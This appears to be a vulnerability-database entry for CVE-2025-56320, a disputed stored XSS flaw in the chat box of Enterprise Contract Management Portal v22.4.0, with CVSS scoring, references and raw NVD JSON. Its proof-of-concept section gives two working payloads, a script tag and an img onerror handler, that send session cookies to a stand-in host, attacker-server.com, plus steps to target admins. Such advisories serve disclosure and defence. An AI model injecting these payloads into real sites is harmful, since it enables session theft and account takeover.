CVE-2025-56320

Description

Enterprise Contract Management Portal v.22.4.0 is vulnerable to Stored Cross-Site Scripting (XSS) in its chat box component. This allows a remote attacker to execute arbitrary code. NOTE: the Supplier reports that this is "Present only in an obsolete, unsupported version no longer in circulation."

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Enterprise Contract Management Portal v22.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-56320 PoC: Stored XSS in Enterprise Contract Management Portal Chat Box -->
<!-- Payload to be injected into the chat box message field -->

<script>
  // Steal session cookie and exfiltrate to attacker-controlled server
  var cookie = document.cookie;
  var img = new Image();
  img.src = "https://attacker-server.com/steal?cookie=" + encodeURIComponent(cookie);
</script>

<!-- Alternative payload using img onerror event handler -->
<img src="x" onerror="fetch('https://attacker-server.com/steal?cookie='+document.cookie)">

<!-- Steps to reproduce:
  1. Login to Enterprise Contract Management Portal v22.4.0 with a valid low-privilege account
  2. Navigate to the chat box component
  3. Paste the above payload into the message input field
  4. Send the message (it gets stored on the server)
  5. When another user (e.g., admin) views the chat, the script executes in their browser
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-56320
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-56320
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-56320/
[4] VulDB https://vuldb.com/cve/CVE-2025-56320
[5] http://cobblestone.com
[6] http://enterprise.com
[7] https://medium.com/@rajput.thakur/stored-xss-in-chat-box-component-cve-2025-56320-87fb10d809e2
[8] https://medium.com/@rajput.thakur/stored-xss-in-chat-box-component-cve-2025-56320-87fb10d809e2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-56320", "sourceIdentifier": "[email protected]", "published": "2025-10-17T19:15:37.840", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "Enterprise Contract Management Portal v.22.4.0 is vulnerable to Stored Cross-Site Scripting (XSS) in its chat box component. This allows a remote attacker to execute arbitrary code. NOTE: the Supplier reports that this is \"Present only in an obsolete, unsupported version no longer in circulation.\""}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://cobblestone.com", "source": "[email protected]"}, {"url": "http://enterprise.com", "source": "[email protected]"}, {"url": "https://medium.com/@rajput.thakur/stored-xss-in-chat-box-component-cve-2025-56320-87fb10d809e2", "source": "[email protected]"}, {"url": "https://medium.com/@rajput.thakur/stored-xss-in-chat-box-component-cve-2025-56320-87fb10d809e2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}